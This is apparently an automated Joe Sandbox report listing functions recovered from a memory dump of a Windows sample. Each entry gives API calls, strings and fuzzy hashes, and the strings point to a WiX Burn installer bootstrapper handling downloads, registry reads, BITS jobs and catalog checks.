CoUninitialize.OLE32(?,005AC721,?,?), ref: 005AADDD

Strings

Failed to pump messages in child process., xrefs: 005AADCB
Failed to initialize COM., xrefs: 005AADAC
Failed to set elevated cache pipe into thread local storage for logging., xrefs: 005AAD8F
elevation.cpp, xrefs: 005AAD85

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: be1d06006d58eee14c035e7b62447f11a3ec5d73077ac18eb244491eb86c2cd0
Instruction ID: 042ee174cc9a53ad6b9e0471e6a7209ac4f28fcf6464678a76a1aa5896198819
Opcode Fuzzy Hash: be1d06006d58eee14c035e7b62447f11a3ec5d73077ac18eb244491eb86c2cd0
Instruction Fuzzy Hash: FF113672902635BB97321785DC099AEBF68FF16B62B12011BFC40B7650EB709D00E2E1

Function 00595CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00595D68

Part of subcall function 005D10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 005D112B
Part of subcall function 005D10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 005D1163

Strings

ProgramFilesDir, xrefs: 00595CF7
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00595D05
CommonFilesDir, xrefs: 00595CF0, 00595D24, 00595D33
Failed to read folder path for '%ls'., xrefs: 00595D34
Failed to open Windows folder key., xrefs: 00595D1A
+, xrefs: 00595CEA
Failed to ensure path was backslash terminated., xrefs: 00595D52

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue$Close
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 1979452859-3209209246
Opcode ID: e534aebef3cbd5e8c18ea04f75e7b917855bc3fc030e782e97b05aa5b35ec5c0
Instruction ID: ae67c7f8a58fcad93d4dd64ab3600d966eee5f86d8a2bcce938d5b5602e8bf69
Opcode Fuzzy Hash: e534aebef3cbd5e8c18ea04f75e7b917855bc3fc030e782e97b05aa5b35ec5c0
Instruction Fuzzy Hash: FB01D232941B2AB7CF336658CC0EEAE7F68FB50721F154157F8006A360A7718E2097A0

Function 005CA20B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,y4\,005C3479,?,?,?,005CA45C,00000001,00000001,ECE85006), ref: 005CA265
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005CA45C,00000001,00000001,ECE85006,?,?,?), ref: 005CA2EB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005CA3E5
__freea.LIBCMT ref: 005CA3F2

Part of subcall function 005C521A: HeapAlloc.KERNEL32(00000000,?,?,?,005C1F87,?,0000015D,?,?,?,?,005C33E0,000000FF,00000000,?,?), ref: 005C524C

__freea.LIBCMT ref: 005CA3FB
__freea.LIBCMT ref: 005CA420

Strings

y4\, xrefs: 005CA21D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID: y4\
API String ID: 3147120248-2107008229
Opcode ID: de643312a6fb0c87444611f249ecadf63e001dccff7a325a13786d2f4ff1f430
Instruction ID: e943ead61ac66cd3bfe6c6dbfa8a0f2103f76dc6c712d0afe1ed29d14946393c
Opcode Fuzzy Hash: de643312a6fb0c87444611f249ecadf63e001dccff7a325a13786d2f4ff1f430
Instruction Fuzzy Hash: 7951FF7261025AAFEB258EA4CC99FAF3FA9FB84B14B154A6DFC04D6140EB34DC80C651

Function 005BA271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 005BA33E
GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 005BA348

Strings

Failed attempt to download URL: '%ls' to: '%ls', xrefs: 005BA425
:, xrefs: 005BA3C1
Failed to clear readonly bit on payload destination path: %ls, xrefs: 005BA377
apply.cpp, xrefs: 005BA36C
download, xrefs: 005BA308

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: a9aa46ca244a9b4225259c223f09b1fde15311b23a819b754f5ceed5054451a9
Instruction ID: 09db304bd2ac754427577037bdb91a76c0840e4c0b9a0cce9b03502f91d5948f
Opcode Fuzzy Hash: a9aa46ca244a9b4225259c223f09b1fde15311b23a819b754f5ceed5054451a9
Instruction Fuzzy Hash: 6A51B175A0021AEBDF10DFA9C845AEEBBF8FF54710F10855AE904EB241E371EA40CB91

Function 005D84C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,005B9063,000002C0,00000100), ref: 005D84F5
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,005B9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 005D8510

Strings

http://appsyndication.org/2006/appsyn, xrefs: 005D84E8
application, xrefs: 005D8502
apuputil.cpp, xrefs: 005D85AB
type, xrefs: 005D8537

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: 9b7619718e29e65524dda30d75397d266dc3acacf1c4d8c6416444f1ddd4dc7e
Instruction ID: 98df4f9ae48c90576a3b5558a79c42f83e69061c33056d04966ace9c90298732
Opcode Fuzzy Hash: 9b7619718e29e65524dda30d75397d266dc3acacf1c4d8c6416444f1ddd4dc7e
Instruction Fuzzy Hash: 3A51A031644602BBDB309E58CC86F2A7FA5BB50B20F208657FA65AB3D1DB70ED40DB50

Function 005D64B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 005D6513
DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 005D660A
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 005D6619

Strings

Burn, xrefs: 005D6502
WiX\Burn, xrefs: 005D6551
dlutil.cpp, xrefs: 005D6537
DownloadTimeout, xrefs: 005D654C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: 064401e158a73d235e999b1ea60ab9e6b103b99a960c72f30e085ef9133cd269
Instruction ID: 13e77fc9b17d8115b50fca15da550c44a22f993be094a0a51bfd1243a0a7176a
Opcode Fuzzy Hash: 064401e158a73d235e999b1ea60ab9e6b103b99a960c72f30e085ef9133cd269
Instruction Fuzzy Hash: AF512A72D01119BBDF22DFA88C45AAEBFB9FB48710F014167FA14E6250E735DA11DBA0

Function 00599EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00599EED
_MREFOpen@16.MSPDB140-MSVCRT ref: 00599F12

Strings

Failed to set variable., xrefs: 00599FF6
Failed to format component id string., xrefs: 00599EF8
Failed to format product code string., xrefs: 00599F1D
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0059A006
Failed to get component path: %d, xrefs: 00599F76

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: c90d80c5b9c0fc0bae223fabfd36dd1a51e39b977d346af5231782abc817c730
Instruction ID: 5746c16df92be63052c9de3f520c114a68c8816020a3e603e9692610518b6cd9
Opcode Fuzzy Hash: c90d80c5b9c0fc0bae223fabfd36dd1a51e39b977d346af5231782abc817c730
Instruction Fuzzy Hash: 2641B432900516BADF36AAAC8C4AABEFF68FF44310F24461BF515E6191E731AE40D791

Function 0059F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0059F942
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0059F94F

Strings

Failed to open registration key., xrefs: 0059F8AB
Failed to format pending restart registry key to read., xrefs: 0059F846
Failed to read Resume value., xrefs: 0059F8D8
%ls.RebootRequired, xrefs: 0059F82F
Resume, xrefs: 0059F8B6

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: b96d690c06ae2f941a93c9cadb427968d8dace83ab4b1682638a0e0de7b31df4
Instruction ID: efc7597f25dc2e2b25c9d3c47d1cbe6d388ae6388cc3bfdc3452ce7439fc8a73
Opcode Fuzzy Hash: b96d690c06ae2f941a93c9cadb427968d8dace83ab4b1682638a0e0de7b31df4
Instruction Fuzzy Hash: DE412972900159FFDF229F98C981BADBFA5FB04710F658176E910EB250C3B1AE419B90

Function 005AAA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to trim source folder., xrefs: 005AAA95
Failed to determine length of relative path., xrefs: 005AAA4D
Failed to set last source., xrefs: 005AAAF0
WixBundleLastUsedSource, xrefs: 005AAA9F, 005AAAA5, 005AAAE1
Failed to determine length of source path., xrefs: 005AAA30

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: 26b57345b194898f79a2a26040f2c9aeeff229df6d010cbca0ea464ffbb39a5f
Instruction ID: afd59c994fcfd2d592215f8a7d69a7651ca6b4ccae5833a12290a29612572859
Opcode Fuzzy Hash: 26b57345b194898f79a2a26040f2c9aeeff229df6d010cbca0ea464ffbb39a5f
Instruction Fuzzy Hash: AB31C832D0016ABFCF229A94CD45E9EBFBAFB41760F114266F910B62D0DB719D40D691

Function 005BD8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(005F0C4C,00000000,00000017,005F0C5C,?,?,00000000,00000000,?,?,?,?,?,005BDEE7,00000000,00000000), ref: 005BD8E8

Strings

Failed to set progress timeout., xrefs: 005BD952
Failed to set BITS job to foreground., xrefs: 005BD969
Failed to create IBackgroundCopyManager., xrefs: 005BD8F4
WixBurn, xrefs: 005BD913
Failed to create BITS job., xrefs: 005BD922
Failed to set notification flags for BITS job., xrefs: 005BD93A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: 50e9deb241c2e9990884b1edfa0396f1409f375b08a4899937f3e4d2be19411c
Instruction ID: 78627e2416f4d0612c4c0a816d6d131ec4dac39bc8cf0ce63ed6f62930748c7b
Opcode Fuzzy Hash: 50e9deb241c2e9990884b1edfa0396f1409f375b08a4899937f3e4d2be19411c
Instruction Fuzzy Hash: D931A431B4071AAFDB14DBA9C855DBFBFB4BF48710B040559FA05EB391DA34AC058BA1

Function 005D5DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 005D5DF8
GetLastError.KERNEL32 ref: 005D5E05
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 005D5E4C
GetLastError.KERNEL32 ref: 005D5E80
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 005D5EB4

Strings

dlutil.cpp, xrefs: 005D5E29, 005D5EA4
%ls.R, xrefs: 005D5DCC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleRead
String ID: %ls.R$dlutil.cpp
API String ID: 3160720760-657863730
Opcode ID: f106a0b52be448609fc3c66497f95e9808b1eb24a049631d34c498f9af6780c0
Instruction ID: 6a4d4da58e92f52b87882cc4835625bf564d004f74e843a50ae954cd9b10098f
Opcode Fuzzy Hash: f106a0b52be448609fc3c66497f95e9808b1eb24a049631d34c498f9af6780c0
Instruction Fuzzy Hash: 6131D772942625EBEB309B598C49B6E7FA8FB04761F114297FE01AB3C0E7705E0096A1

Function 0059C8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0059CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0059E444,000000FF,00000000,00000000,0059E444,?,?,0059DBEB,?,?,?,?), ref: 0059CD89

CreateFileW.KERNEL32(E9005DBA,80000000,00000005,00000000,00000003,08000000,00000000,005953C5,?,00000000,840F01E8,14680A79,00000001,005953BD,00000000,00595489), ref: 0059C956
GetLastError.KERNEL32(?,?,?,005A7809,0059566D,00595479,00595479,00000000,?,00595489,FFF9E89D,00595489,005954BD,00595445,?,00595445), ref: 0059C99B

Strings

Failed to get catalog local file path, xrefs: 0059C9D9
Failed to find payload for catalog file., xrefs: 0059C9E0
catalog.cpp, xrefs: 0059C9BC
Failed to open catalog in working path: %ls, xrefs: 0059C9C9
Failed to verify catalog signature: %ls, xrefs: 0059C994

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareCreateErrorFileLastString
String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
API String ID: 1774366664-48089280
Opcode ID: f6f51f55a3b4bf4df3d0e99c581135409e7191ddeecd87fbdd5aad65df938ac3
Instruction ID: 4d115a5da6bedd460351a924dd69783bf306c15bbdf357854f356b7312a98765
Opcode Fuzzy Hash: f6f51f55a3b4bf4df3d0e99c581135409e7191ddeecd87fbdd5aad65df938ac3
Instruction Fuzzy Hash: 7D31C132941626BBDB219B58CC06B5DBFA4FF04760F218627B905EB280E771BD109BD0

Function 005BD33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,762330B0,00000000,?,?,?,?,005BD642,?), ref: 005BD357
ReleaseMutex.KERNEL32(?,?,?,?,005BD642,?), ref: 005BD375
WaitForSingleObject.KERNEL32(?,000000FF), ref: 005BD3B6
ReleaseMutex.KERNEL32(?), ref: 005BD3CD
SetEvent.KERNEL32(?), ref: 005BD3D6

Strings

Failed to get message from netfx chainer., xrefs: 005BD3F7
Failed to send files in use message from netfx chainer., xrefs: 005BD41C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: e67148e88523b7a308aa5b8a302d218d64bd41131b549c189f70514e1381ebb7
Instruction ID: 99ccaaed6f55a9ade682ed7a4401da6c001ac9a97c556e1b99b6ffb9994b4dea
Opcode Fuzzy Hash: e67148e88523b7a308aa5b8a302d218d64bd41131b549c189f70514e1381ebb7
Instruction Fuzzy Hash: F531D436900609EFCF218F94DC08EEEBFF5BF44320F108666F964A2261D770A9049B90

Function 005D093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 005D09AB
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 005D09B5
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 005D09FE
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 005D0A0B

Strings

"%ls" %ls, xrefs: 005D0974
procutil.cpp, xrefs: 005D09D9
D, xrefs: 005D0993

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: 300d14cb05ed3d5eef707478959b3288a2f98c6e24c655e0d31a12557618b29b
Instruction ID: 9d691f19b1abc22a6ec689925e1f4cfd93fd8119ca639349c85054743bf1bb5f
Opcode Fuzzy Hash: 300d14cb05ed3d5eef707478959b3288a2f98c6e24c655e0d31a12557618b29b
Instruction Fuzzy Hash: 37212D71D0121EABDB21DFD9C945AAEBBB9BF44750F110527EA00B7351D3709E049BA1

Function 00599B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00599BB3
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0059A8AB,00000100,000002C0,000002C0,00000100), ref: 00599BD3
GetLastError.KERNEL32(?,0059A8AB,00000100,000002C0,000002C0,00000100), ref: 00599BDE

Strings

Failed to set directory search path variable., xrefs: 00599C0F
Failed while searching directory search: %ls, for path: %ls, xrefs: 00599C34
Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00599C4A
Failed to format variable string., xrefs: 00599BBE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: c230e54ce2dfca4eb01e16f1e288ff84cb87222231dec5edfcfd7bd8e2f5ef71
Instruction ID: 51a18beb62f355977b489b9945637d765d9d20794f0f4fd65515b3621c50530b
Opcode Fuzzy Hash: c230e54ce2dfca4eb01e16f1e288ff84cb87222231dec5edfcfd7bd8e2f5ef71
Instruction Fuzzy Hash: DB21D437940026FACF32269C9E0AB5DBF69BF10760F25020BF9107A29197259E50A7D9

Function 00599D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00599D64
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0059A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00599D84
GetLastError.KERNEL32(?,0059A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00599D8F

Strings

File search: %ls, did not find path: %ls, xrefs: 00599DF3
Failed to set variable to file search path., xrefs: 00599DE7
Failed while searching file search: %ls, for path: %ls, xrefs: 00599DBD
Failed to format variable string., xrefs: 00599D6F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

